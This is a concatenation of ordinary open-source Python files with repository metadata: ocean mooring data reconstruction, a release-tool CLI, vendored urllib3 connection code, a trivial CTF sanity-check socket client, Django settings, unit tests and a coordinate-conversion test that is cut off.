sal_mdiff_int['from200']=hstack((sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:2])) # Plot the difference between 50db instrument temp and sal with the two other instruments. def plot_saltmp_diff(): f,[ax1,ax2]=subplots(2,1,figsize=(12,10),sharex=True) plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100),'C0','50m-100m') ax1.plot(mtime,sal_mdiff_int['from100'],'o-',color='C0') plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200),'C1','50m-200m') ax1.plot(mtime,sal_mdiff_int['from200'],'o-',color='C1') plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=100)-dat18.PSAL.sel(DEPTH=200),'C2','100m-200m') ax1.axhline(0,color='k') ax1.legend() ax1.set_ylabel('salinity difference') plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100),'C0','50m-100m') plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200),'C1','50m-200m') plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=100)-dat18.PTMP.sel(DEPTH=200),'C2','100m-200m') ax2.axhline(0,color='k') ax2.set_ylabel('temperature difference') plot_saltmp_diff() savefig(figdir+'merging_overview/CF1_saltmpdiff.png') ptmp_r50={} ptmp_r50['from100']=dat18.PTMP.sel(DEPTH=100)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100)) ptmp_r50['from200']=dat18.PTMP.sel(DEPTH=200)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200)) def toTimestamp(d): return calendar.timegm(d.timetuple()) def to_datetime_andordinal(date): """ Converts a numpy datetime64 object to a python datetime object Input: date - a np.datetime64 object Output: DATE - a python datetime object """ timestamp = ((date - np.datetime64('1970-01-01T00:00:00')) / np.timedelta64(1, 's')) dtimeobj=datetime.datetime.utcfromtimestamp(timestamp) return datetime.datetime.toordinal(dtimeobj) time_month=[to_datetime_andordinal(ddd) for ddd in mtime.values] time_all=[to_datetime_andordinal(ddd) for ddd in dat18.TIME.values] f100=interp1d(time_month,sal_mdiff_int['from100'],bounds_error=False) f200=interp1d(time_month,sal_mdiff_int['from200'],bounds_error=False) sal_mdiff_fulltime={} sal_mdiff_fulltime['from100']=f100(time_all) sal_mdiff_fulltime['from200']=f200(time_all) psal_r50={} psal_r50['from100']=dat18.PSAL.sel(DEPTH=100)+sal_mdiff_fulltime['from100'] psal_r50['from200']=dat18.PSAL.sel(DEPTH=200)+sal_mdiff_fulltime['from200'] def comp_from100200(): f,[ax1,ax2]=subplots(2,1,figsize=(12,10)) ptmp_r50['from100'].plot(ax=ax1,label='from 100m') ptmp_r50['from200'].plot(ax=ax1,label='from 200m') dat18.PTMP.sel(DEPTH=50).plot(ax=ax1,label='directly measured') ax1.legend() ax1.set_title('') psal_r50['from100'].plot(ax=ax2,label='from 100m') psal_r50['from200'].plot(ax=ax2,label='from 200m') dat18.PSAL.sel(DEPTH=50).plot(ax=ax2,label='directly measured') ax2.set_title('') comp_from100200() ############################################################################### ##### Save a reconstructed product which keeps recorder 50m data #### And adds the 100m reconstruction beyond that #### This is simply because the 100m is present,closer and noisier #### It wouldn't make sense for 50m instrument to have less variability ################################################################################ dat18_recon=dat18.copy() dat18_recon['PSAL'].sel(DEPTH=50)[isnan(dat18['PSAL'].sel(DEPTH=50))]=psal_r50['from100'][isnan(dat18['PSAL'].sel(DEPTH=50))].values dat18_recon['PTMP'].sel(DEPTH=50)[isnan(dat18['PTMP'].sel(DEPTH=50))]=ptmp_r50['from100'][isnan(dat18['PTMP'].sel(DEPTH=50))].values dat18_recon['PRES'].sel(DEPTH=50)[isnan(dat18['PRES'].sel(DEPTH=50))]=mean(dat18['PRES'].sel(DEPTH=50)) plot(dat18_recon['PRES']); plot_overview(dat16_recon,dat18_recon) savefig(figdir+'merging_overview/CF1_overview_1618recon.png') dat18_recon.to_netcdf(datadir+'OSNAP2018recovery/mcat_nc/CF1_mcat_recon_2018recovery_daily.nc','w',format='netCDF4')
0564a1a72dcfd96a4e5f97d467c399d260cf2044
6ba8a0ebb55fee0406da9e4c6784def6391cf61b
/pyartcd/pyartcd/cli.py
62569db660eb11953ff60867489214cead41a104
[ "Apache-2.0" ]
permissive
gabemontero/aos-cd-jobs
a354d680250bf306a90a24ec5023cf203658df59
0208570f5bf14d6f9672da84b0edb6cffaaded92
refs/heads/master
2021-09-28T04:57:13.789002
2021-09-21T09:18:05
2021-09-21T09:18:05
96,802,806
0
0
null
2017-07-10T17:17:20
2017-07-10T17:17:20
null
UTF-8
Python
false
false
2,047
py
import asyncio from functools import update_wrapper import logging from pathlib import Path from typing import Optional import click from pyartcd.runtime import Runtime pass_runtime = click.make_pass_decorator(Runtime) def click_coroutine(f): """ A wrapper to allow to use asyncio with click. https://github.com/pallets/click/issues/85 """ f = asyncio.coroutine(f) def wrapper(*args, **kwargs): loop = asyncio.get_event_loop() return loop.run_until_complete(f(*args, **kwargs)) return update_wrapper(wrapper, f) # ============================================================================ # GLOBAL OPTIONS: parameters for all commands # ============================================================================ @click.group(context_settings=dict(help_option_names=['-h', '--help'])) @click.option("--config", "-c", metavar='PATH', help="Configuration file ('~/.config/artcd.toml' by default)") @click.option("--working-dir", "-C", metavar='PATH', default=None, help="Existing directory in which file operations should be performed (current directory by default)") @click.option("--dry-run", is_flag=True, help="don't actually execute the pipeline; just print what would be done") @click.option("--verbosity", "-v", count=True, help="[MULTIPLE] increase output verbosity") @click.pass_context def cli(ctx: click.Context, config: Optional[str], working_dir: Optional[str], dry_run: bool, verbosity: int): config_filename = config or Path("~/.config/artcd.toml").expanduser() working_dir = working_dir or Path.cwd() # configure logging if not verbosity: logging.basicConfig(level=logging.WARNING) elif verbosity == 1: logging.basicConfig(level=logging.INFO) elif verbosity >= 2: logging.basicConfig(level=logging.DEBUG) else: raise ValueError(f"Invalid verbosity {verbosity}") ctx.obj = Runtime.from_config_file(config_filename, working_dir=Path(working_dir), dry_run=dry_run)
5e03d1a71d8a7262ee7ec1c4f55eb8fa0a2af5da
b48ca98425b9510d16623277a0761a33c00d028d
/SeatReservation-Version3.0/SeatReservation-master/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/_vendor/requests/packages/urllib3/connection.py
496d7048b6cdceee53feae1715a631d048b1b441
[]
no_license
billgoo/WHULibSeatReservation
f74a01db19f51a2034772d932c59afd9f63c7753
5423ef7df253739ccf279365c1dec1ebfe7f2c4f
refs/heads/master
2020-04-02T07:18:33.174744
2018-12-23T15:26:15
2018-12-23T15:26:15
154,190,237
0
1
null
null
null
null
UTF-8
Python
false
false
11,923
py
import datetime import logging import os import sys import socket from socket import error as SocketError, timeout as SocketTimeout import warnings from .packages import six try: # Python 3 from http.client import HTTPConnection as _HTTPConnection from http.client import HTTPException # noqa: unused in this module except ImportError: from http.client import HTTPConnection as _HTTPConnection from http.client import HTTPException # noqa: unused in this module try: # Compiled with SSL? import ssl BaseSSLError = ssl.SSLError except (ImportError, AttributeError): # Platform-specific: No SSL. ssl = None class BaseSSLError(BaseException): pass try: # Python 3: # Not a no-op, we're adding this to the namespace so it can be imported. ConnectionError = ConnectionError except NameError: # Python 2: class ConnectionError(Exception): pass from .exceptions import ( NewConnectionError, ConnectTimeoutError, SubjectAltNameWarning, SystemTimeWarning, ) from .packages.ssl_match_hostname import match_hostname, CertificateError from .util.ssl_ import ( resolve_cert_reqs, resolve_ssl_version, ssl_wrap_socket, assert_fingerprint, ) from .util import connection from ._collections import HTTPHeaderDict log = logging.getLogger(__name__) port_by_scheme = { 'http': 80, 'https': 443, } RECENT_DATE = datetime.date(2014, 1, 1) class DummyConnection(object): """Used to detect a failed ConnectionCls import.""" pass class HTTPConnection(_HTTPConnection, object): """ Based on httplib.HTTPConnection but provides an extra constructor backwards-compatibility layer between older and newer Pythons. Additional keyword parameters are used to configure attributes of the connection. Accepted parameters include: - ``strict``: See the documentation on :class:`urllib3.connectionpool.HTTPConnectionPool` - ``source_address``: Set the source address for the current connection. .. note:: This is ignored for Python 2.6. It is only applied for 2.7 and 3.x - ``socket_options``: Set specific options on the underlying socket. If not specified, then defaults are loaded from ``HTTPConnection.default_socket_options`` which includes disabling Nagle's algorithm (sets TCP_NODELAY to 1) unless the connection is behind a proxy. For example, if you wish to enable TCP Keep Alive in addition to the defaults, you might pass:: HTTPConnection.default_socket_options + [ (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1), ] Or you may want to disable the defaults by passing an empty list (e.g., ``[]``). """ default_port = port_by_scheme['http'] #: Disable Nagle's algorithm by default. #: ``[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]`` default_socket_options = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)] #: Whether this connection verifies the host's certificate. is_verified = False def __init__(self, *args, **kw): if six.PY3: # Python 3 kw.pop('strict', None) # Pre-set source_address in case we have an older Python like 2.6. self.source_address = kw.get('source_address') if sys.version_info < (2, 7): # Python 2.6 # _HTTPConnection on Python 2.6 will balk at this keyword arg, but # not newer versions. We can still use it when creating a # connection though, so we pop it *after* we have saved it as # self.source_address. kw.pop('source_address', None) #: The socket options provided by the user. If no options are #: provided, we use the default options. self.socket_options = kw.pop('socket_options', self.default_socket_options) # Superclass also sets self.source_address in Python 2.7+. _HTTPConnection.__init__(self, *args, **kw) def _new_conn(self): """ Establish a socket connection and set nodelay settings on it. :return: New socket connection. """ extra_kw = {} if self.source_address: extra_kw['source_address'] = self.source_address if self.socket_options: extra_kw['socket_options'] = self.socket_options try: conn = connection.create_connection( (self.host, self.port), self.timeout, **extra_kw) except SocketTimeout as e: raise ConnectTimeoutError( self, "Connection to %s timed out. (connect timeout=%s)" % (self.host, self.timeout)) except SocketError as e: raise NewConnectionError( self, "Failed to establish a new connection: %s" % e) return conn def _prepare_conn(self, conn): self.sock = conn # the _tunnel_host attribute was added in python 2.6.3 (via # http://hg.python.org/cpython/rev/0f57b30a152f) so pythons 2.6(0-2) do # not have them. if getattr(self, '_tunnel_host', None): # TODO: Fix tunnel so it doesn't depend on self.sock state. self._tunnel() # Mark this connection as not reusable self.auto_open = 0 def connect(self): conn = self._new_conn() self._prepare_conn(conn) def request_chunked(self, method, url, body=None, headers=None): """ Alternative to the common request method, which sends the body with chunked encoding and not as one block """ headers = HTTPHeaderDict(headers if headers is not None else {}) skip_accept_encoding = 'accept-encoding' in headers self.putrequest(method, url, skip_accept_encoding=skip_accept_encoding) for header, value in list(headers.items()): self.putheader(header, value) if 'transfer-encoding' not in headers: self.putheader('Transfer-Encoding', 'chunked') self.endheaders() if body is not None: stringish_types = six.string_types + (six.binary_type,) if isinstance(body, stringish_types): body = (body,) for chunk in body: if not chunk: continue if not isinstance(chunk, six.binary_type): chunk = chunk.encode('utf8') len_str = hex(len(chunk))[2:] self.send(len_str.encode('utf-8')) self.send(b'\r\n') self.send(chunk) self.send(b'\r\n') # After the if clause, to always have a closed body self.send(b'0\r\n\r\n') class HTTPSConnection(HTTPConnection): default_port = port_by_scheme['https'] def __init__(self, host, port=None, key_file=None, cert_file=None, strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, **kw): HTTPConnection.__init__(self, host, port, strict=strict, timeout=timeout, **kw) self.key_file = key_file self.cert_file = cert_file # Required property for Google AppEngine 1.9.0 which otherwise causes # HTTPS requests to go out as HTTP. (See Issue #356) self._protocol = 'https' def connect(self): conn = self._new_conn() self._prepare_conn(conn) self.sock = ssl.wrap_socket(conn, self.key_file, self.cert_file) class VerifiedHTTPSConnection(HTTPSConnection): """ Based on httplib.HTTPSConnection but wraps the socket with SSL certification. """ cert_reqs = None ca_certs = None ca_cert_dir = None ssl_version = None assert_fingerprint = None def set_cert(self, key_file=None, cert_file=None, cert_reqs=None, ca_certs=None, assert_hostname=None, assert_fingerprint=None, ca_cert_dir=None): if (ca_certs or ca_cert_dir) and cert_reqs is None: cert_reqs = 'CERT_REQUIRED' self.key_file = key_file self.cert_file = cert_file self.cert_reqs = cert_reqs self.assert_hostname = assert_hostname self.assert_fingerprint = assert_fingerprint self.ca_certs = ca_certs and os.path.expanduser(ca_certs) self.ca_cert_dir = ca_cert_dir and os.path.expanduser(ca_cert_dir) def connect(self): # Add certificate verification conn = self._new_conn() resolved_cert_reqs = resolve_cert_reqs(self.cert_reqs) resolved_ssl_version = resolve_ssl_version(self.ssl_version) hostname = self.host if getattr(self, '_tunnel_host', None): # _tunnel_host was added in Python 2.6.3 # (See: http://hg.python.org/cpython/rev/0f57b30a152f) self.sock = conn # Calls self._set_hostport(), so self.host is # self._tunnel_host below. self._tunnel() # Mark this connection as not reusable self.auto_open = 0 # Override the host with the one we're requesting data from. hostname = self._tunnel_host is_time_off = datetime.date.today() < RECENT_DATE if is_time_off: warnings.warn(( 'System time is way off (before {0}). This will probably ' 'lead to SSL verification errors').format(RECENT_DATE), SystemTimeWarning ) # Wrap socket using verification with the root certs in # trusted_root_certs self.sock = ssl_wrap_socket(conn, self.key_file, self.cert_file, cert_reqs=resolved_cert_reqs, ca_certs=self.ca_certs, ca_cert_dir=self.ca_cert_dir, server_hostname=hostname, ssl_version=resolved_ssl_version) if self.assert_fingerprint: assert_fingerprint(self.sock.getpeercert(binary_form=True), self.assert_fingerprint) elif resolved_cert_reqs != ssl.CERT_NONE \ and self.assert_hostname is not False: cert = self.sock.getpeercert() if not cert.get('subjectAltName', ()): warnings.warn(( 'Certificate for {0} has no `subjectAltName`, falling back to check for a ' '`commonName` for now. This feature is being removed by major browsers and ' 'deprecated by RFC 2818. (See https://github.com/shazow/urllib3/issues/497 ' 'for details.)'.format(hostname)), SubjectAltNameWarning ) _match_hostname(cert, self.assert_hostname or hostname) self.is_verified = (resolved_cert_reqs == ssl.CERT_REQUIRED or self.assert_fingerprint is not None) def _match_hostname(cert, asserted_hostname): try: match_hostname(cert, asserted_hostname) except CertificateError as e: log.error( 'Certificate did not match expected hostname: %s. ' 'Certificate: %s', asserted_hostname, cert ) # Add cert to exception and reraise so client code can inspect # the cert when catching the exception, if they want to e._peer_cert = cert raise if ssl: # Make a copy for testing. UnverifiedHTTPSConnection = HTTPSConnection HTTPSConnection = VerifiedHTTPSConnection else: HTTPSConnection = DummyConnection
433aa413dbbf3fa57c5763bd7eb0530e55be08f0
830465731dfda87b4141546262f20d74c29297bf
/Games/DagwCTF2020/TakeItBackNow/client0.py
3e577c3492467502cc615738464b2bae91453420
[]
no_license
jchen8tw-research/CTF
f559d7ca0e16a730335b11caeeae208c42e8bf17
f49615c24437a9cc6a2c20d6b30cb5abf7a32b71
refs/heads/master
2023-03-17T12:29:08.630613
2021-03-23T06:31:26
2021-03-23T06:31:26
null
0
0
null
null
null
null
UTF-8
Python
false
false
646
py
# -*- coding: utf-8 -*- """ Created for Spring 2020 CTF Cryptography 0 10 Points Welcome to my sanity check. You'll find this to be fairly easy. The oracle is found at umbccd.io:13370, and your methods are: flg - returns the flag tst - returns the message after the : in "tst:..." @author: pleoxconfusa """ import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = ('crypto.ctf.umbccd.io', 13370) sock.connect(server_address) #available methods: flg, tst. msg = 'tst:hello' sock.sendall(msg.encode()) data = sock.recv(1024) print(data.decode()) sock.close()
b542e098a92e72342cb38640aacc06125c27de7f
998610ed0b370c5beb73d908164d07f6f9a692ab
/tachovendo_proj/settings/base.py
2eeb26e276275d69531b6b692436f73ad4a6f279
[]
no_license
loogica/tachovendo_backend
d372f0032cc5ab02883c433cc2ed36467adf85c9
4333a55716df31897eeecb84ffa019456336e010
refs/heads/master
2016-09-06T08:06:07.003269
2013-06-04T01:03:36
2013-06-04T01:03:36
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,111
py
# coding: utf-8 """Common settings and globals.""" import os from os.path import abspath, basename, dirname, join, normpath from sys import argv, path from unipath import Path ########## PATH CONFIGURATION # Absolute filesystem path to the Django project directory: DJANGO_ROOT = dirname(dirname(abspath(__file__))) PROJECT_ROOT = Path(__file__).ancestor(3) # Absolute filesystem path to the top-level project folder: SITE_ROOT = dirname(DJANGO_ROOT) # Site name: SITE_NAME = basename(DJANGO_ROOT) # Add our project to our pythonpath, this way we don't need to type our project # name in our dotted import paths: path.append(DJANGO_ROOT) ########## END PATH CONFIGURATION ########## DEBUG CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug DEBUG = False # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug TEMPLATE_DEBUG = DEBUG ########## END DEBUG CONFIGURATION ########## MANAGER CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins ADMINS = ( ('you', '[email protected]'), ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers MANAGERS = ADMINS ########## END MANAGER CONFIGURATION ########## DATABASE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': '', 'USER': '', 'PASSWORD': '', 'HOST': '', 'PORT': '', } } ########## END DATABASE CONFIGURATION ########## GENERAL CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone TIME_ZONE = 'America/Sao_Paulo' # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code LANGUAGE_CODE = 'pt-br' gettext = lambda s: s LANGUAGES = ( ('pt', gettext('Português')), ('en', gettext('English')), ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id SITE_ID = 1 # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n USE_I18N = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n USE_L10N = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz USE_TZ = True LOCALE_PATHS = normpath(join(DJANGO_ROOT, 'locale')) ########## END GENERAL CONFIGURATION ########## MEDIA CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root MEDIA_ROOT = normpath(join(DJANGO_ROOT, 'media')) # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url MEDIA_URL = '/media/' ########## END MEDIA CONFIGURATION ########## STATIC FILE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root STATIC_ROOT = normpath(join(DJANGO_ROOT, 'assets')) # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url STATIC_URL = '/static/' # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS STATICFILES_DIRS = ( normpath(join(DJANGO_ROOT, 'static')), ) # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) ########## END STATIC FILE CONFIGURATION ########## SECRET CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key # Note: This key only used for development and testing. SECRET_KEY = r"$&jkf@shv+tec-uz_t5qz0u7nxrp%2b4v!9ym3rqd!=mmy-7+*" ########## END SECRET CONFIGURATION ########## FIXTURE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS FIXTURE_DIRS = ( normpath(join(SITE_ROOT, 'fixtures')), ) ########## END FIXTURE CONFIGURATION ########## TEMPLATE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', 'django.core.context_processors.tz', 'django.contrib.messages.context_processors.messages', 'django.core.context_processors.request', ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs TEMPLATE_DIRS = ( normpath(join(DJANGO_ROOT, 'templates')), ) ########## END TEMPLATE CONFIGURATION ########## MIDDLEWARE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#middleware-classes MIDDLEWARE_CLASSES = ( # Default Django middleware. 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.locale.LocaleMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', ) ########## END MIDDLEWARE CONFIGURATION ########## URL CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf ROOT_URLCONF = '%s.urls' % SITE_NAME ########## END URL CONFIGURATION # Auth views Config LOGIN_URL = "/login" LOGIN_REDIRECT_URL = "/" # End ########## APP CONFIGURATION DJANGO_APPS = ( # Default Django apps: 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', # Useful template tags: # 'django.contrib.humanize', 'django.contrib.admin', ) THIRD_PARTY_APPS = ( # Database migration helpers: 'south', 'widget_tweaks', ) # Apps specific for this project go here. LOCAL_APPS = ( 'tachovendo', ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS ########## END APP CONFIGURATION ########## RIOAPPS KEY CONFIG APP_ID = os.environ.get('RIOAPPS_APP_ID') APP_SECRET = os.environ.get('RIOAPPS_APP_SECRET') ########## END RIOAPPS KEYS CONFIG ########## LOGGING CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'verbose': { 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s' }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'null': { 'level': 'DEBUG', 'class': 'django.utils.log.NullHandler', }, 'console':{ 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'simple' }, 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, 'events.views': { 'handlers': ['console'], 'level': 'INFO', 'propagate': True, }, } } ########## END LOGGING CONFIGURATION ########## WSGI CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application WSGI_APPLICATION = 'wsgi.application' ########## END WSGI CONFIGURATION
2b17d640e22b95cc5a61021381c03af14f83aee7
a30362e51cb3291daf26d0c62e56c42caeec837f
/python/acmicpc/unsolved/8984.py
e9fc6b9f6e862ee51d73a36e02a12d6bc484c6b5
[]
no_license
TERADA-DANTE/algorithm
03bf52764c6fcdb93d7c8a0ed7a672834f488412
20bdfa1a5a6b9c378e588b17073e77a0126f7339
refs/heads/master
2023-04-14T21:40:11.250022
2023-04-12T13:00:37
2023-04-12T13:00:37
288,335,057
0
0
null
null
null
null
UTF-8
Python
false
false
210
py
import sys input = sys.stdin.readline n, l = list(map(int, input().split())) lines = [list(map(int, input().split())) for _ in range(n)] def solution(n, l, lines): return n, l, lines print(n, l, lines)
3f14475e0c2863c12b7447c7a82f14ad759b824e
a140fe192fd643ce556fa34bf2f84ddbdb97f091
/.history/class맴버변수_20200708170750.py
62351d8c9312e58d87ab4c22a5685c88c76c9c41
[]
no_license
sangha0719/py-practice
826f13cb422ef43992a69f822b9f04c2cb6d4815
6d71ce64bf91cc3bccee81378577d84ba9d9c121
refs/heads/master
2023-03-13T04:40:55.883279
2021-02-25T12:02:04
2021-02-25T12:02:04
342,230,484
0
0
null
null
null
null
UTF-8
Python
false
false
374
py
class Unit: def __init__(self, name, hp, damage): self.name = name self.hp = hp self.damage = damage print("{0} 유닛이 생성 되었습니다.".format(self.name)) print("체력 {0}, 공격력 {1}".format(self.hp, self.damage)) # 레이스 : 공중 유닛, 비행기, 클로킹 (상대방에게 보이지 않음) wraith = Unit
76c6674b3a2fb4f35bd3276d78443a663070b14f
163bbb4e0920dedd5941e3edfb2d8706ba75627d
/Code/CodeRecords/2950/60632/269982.py
e99e3be7a8277b32c3e022c23301da28661ec71a
[]
no_license
AdamZhouSE/pythonHomework
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
ffc5606817a666aa6241cfab27364326f5c066ff
refs/heads/master
2022-11-24T08:05:22.122011
2020-07-28T16:21:24
2020-07-28T16:21:24
259,576,640
2
1
null
null
null
null
UTF-8
Python
false
false
273
py
s = list(input()) if len(s) % 2 == 1: print(-1) else: result = 0 for i in range(len(s)): if s[:i].count('5') > s[:i].count('2'): result = -1 break result = max(s[:1].count('2')-s[:1].count('5'), result) print(result)
54a8883bb18ba783ca7d90de1608b104223d1c3f
30dbb8c5a5cce9dfea904924f00a1451abd0c88b
/이분탐색/입국심사.py
d1b435138bd0d7498ccb48efc79bedafab3961ee
[]
no_license
gksrb2656/AlgoPractice
7eac983509de4c5f047a880902253e477f4ca27c
5285479625429b8ef46888c8611dc132924833b7
refs/heads/master
2020-12-22T17:20:33.677147
2020-09-22T16:05:53
2020-09-22T16:05:53
236,872,750
0
0
null
null
null
null
UTF-8
Python
false
false
428
py
def solution(n, times): l = 1 r = max(times)*n answer = 0 while l <= r: mid = (l + r) // 2 flag = 0 people = 0 for t in times: people += mid // t if people >= n: flag = 1 answer = mid break if flag: r = mid - 1 else: l = mid + 1 return answer solution(6, [7, 10])
149a39da8051edd413bd0e53d557532e042ebf01
fc6f0806292263bbfb2055587468df68ab6a950e
/tests/test_mixins.py
dad5938477e9c873a7c71c6b6f343aff1a6fd7b9
[ "Apache-2.0" ]
permissive
WithPrecedent/sourdough
8c0a5cff14c2257162fd1d66bf03a5a53f6a9571
e42f81e5b27b067e13ff17338300e56c23ae4cad
refs/heads/master
2023-03-03T16:23:10.857530
2021-02-10T04:49:57
2021-02-10T04:49:57
261,512,460
0
0
null
null
null
null
UTF-8
Python
false
false
1,898
py
""" test_mixins: unit tests for Component mixins Corey Rayburn Yung <[email protected]> Copyright 2020-2021, Corey Rayburn Yung License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0) """ import dataclasses import sourdough @dataclasses.dataclass class AComponent( sourdough.Bunch, sourdough.Registry, sourdough.quirks.Element): pass @dataclasses.dataclass class OtherComponent(AComponent): pass @dataclasses.dataclass class AnotherComponent(sourdough.Options, OtherComponent): options = sourdough.Catalog(contents = { 'base': AComponent(), 'other': OtherComponent()}) @dataclasses.dataclass class ProxiedComponent(sourdough.Proxy, OtherComponent): def __post_init__(self): super().__post_init__() self._hidden_attribute = 'value' self.proxify(proxy = 'new_property', attribute = '_hidden_attribute') def test_mixins(): # Tests Component, Registry, and Bunch a_component = AComponent() other_component = OtherComponent() assert 'other_component' in AComponent.store assert 'other_component' in a_component.store assert 'other_component' in AComponent.store assert 'other_component' in a_component.store an_instance = a_component.instance(key = 'other_component', name = 'test') assert an_instance.name == 'test' another_instance = a_component.borrow(key = 'other_component') assert another_instance.name == 'other_component' # Tests Options another_component = AnotherComponent() base_instance = another_component.select(key = 'base') other_instance = another_component.select(key = 'other') assert other_instance.name == 'other_component' # Tests Proxy # proxied_component = ProxiedComponent() # assert proxied_component.new_property == 'value' return if __name__ == '__main__': test_mixins()
20878697ebaf854f56e4a45f312b2032fba93a2c
ef8c5c55b6ec3971adff9afe2db1f76556b87082
/code_examples/PyKIM/util/convert_coord/test_cart_cs.py
73f53cd89f0df756db61dc64bfb03fbd2688b823
[]
no_license
wbkifun/my_stuff
7007efc94b678234097abf0df9babfbd79dcf0ff
0b5ad5d4d103fd05989b514bca0d5114691f8ff7
refs/heads/master
2020-12-10T22:40:28.532993
2017-11-15T11:39:41
2017-11-15T11:39:41
5,178,225
1
0
null
null
null
null
UTF-8
Python
false
false
4,608
py
import numpy as np from numpy import pi, sin, cos, tan, sqrt from numpy.random import rand, randint from numpy.testing import assert_equal as equal from numpy.testing import assert_array_equal as a_equal from numpy.testing import assert_array_almost_equal as aa_equal from nose.tools import raises, ok_ import sys from os.path import abspath, dirname current_dpath = dirname(abspath(__file__)) sys.path.append(current_dpath) def test_xyp2xyz(): ''' xyp2xyz(): center of panel, at panel border ''' from cart_cs import xyp2xyz R = 1 a = R/sqrt(3) #------------------------------------------------ # center of panel #------------------------------------------------ x, y, panel = 0, 0, 1 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (1,0,0)) x, y, panel = 0, 0, 2 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (0,1,0)) x, y, panel = 0, 0, 3 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (-1,0,0)) x, y, panel = 0, 0, 4 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (0,-1,0)) x, y, panel = 0, 0, 5 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (0,0,-1)) x, y, panel = 0, 0, 6 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (0,0,1)) #------------------------------------------------ # at the panel border #------------------------------------------------ alpha = pi/4 x, y, panel = a*tan(alpha), 